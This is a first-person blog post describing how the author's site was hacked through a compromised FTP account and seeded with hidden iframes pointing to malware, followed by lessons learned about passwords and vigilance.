Monday, I wrote a post about some of the latest trends in cyber crime.
Tuesday afternoon, our Web site was hacked.
We didn’t realize it until we landed on the Google blacklist this morning, although I should have suspected something when I noticed, on Tuesday afternoon, that both of our two instances of WordPress – the one that powers this blog, and the one that powers our “News” page – had stopped working. But, since I knew that I was a couple of revisions behind, I elected to upgrade my WordPress instances to the latest release. When they came back up working again, I didn’t probe any deeper. I should have known better.
Log analysis indicates that our FTP account was compromised. Beginning at about 3:18 pm PDT on Tuesday afternoon, a series of files were uploaded to our server from an IP address that appears to be located somewhere in the UK (in the London area, to be more precise). The file transfers were done using the FTP account for our domain. They went through our site and changed every index.* page. Specifically, they placed a “hidden iframe” immediately following the <body> tag.
For those who aren’t conversant with HTML, you can think of an “iframe” as a window on a Web page that displays content from another Web page. Except that, in this case, the height, width, and border width of that window were set to “0.” The point being that when your browser loaded the page from our site, it would also load the content from the other site, but it wouldn’t be visible on the page. That content was, no doubt, some kind of malware that was intended to do something bad to your system. The hidden iframe attack is one of the most common exploits out there, and is typically used for some kind of “drive by” malware distribution campaign where the bad guys try to place their hidden iframe on as many legitimate sites as possible. When you visit the site, your browser fetches the code, and now it’s a matter of how good the defenses are on your PC.
Obviously, we’ve changed the FTP account credentials. But, frankly, we’re still not sure how the account was compromised in the first place. It was a pretty strong password, and not one that you’d expect to fall victim to a dictionary attack. We’ve been running malware scans on the machines that we normally use when we work on the Web site, and have yet to come up with a “smoking gun” that would explain how the credentials were compromised.
So…what to take away from this? First of all, it’s no fun to become a statistic. Second, nobody is immune to this sort of thing. Even the CBS News Web site was hit by an iframe attack not that long ago. Nobody is too big or too small to be targeted. Third, change your passwords regularly, even if you think you have strong ones. Fourth, be suspicious when something unusual happens. I should have dug deeper Tuesday afternoon, but it was late in the day when it happened, and I settled for what looked like an easy fix. Finally, it’s a pain in the you-know-what to go through and clean up the aftermath of something like this. It’s cost me most of today, plus we’ve been on the Google blacklist all day and probably won’t come off of it until sometime tomorrow when they’ve had time to re-scan our site.
The bad guys are out there, and they do want your stuff. Be careful.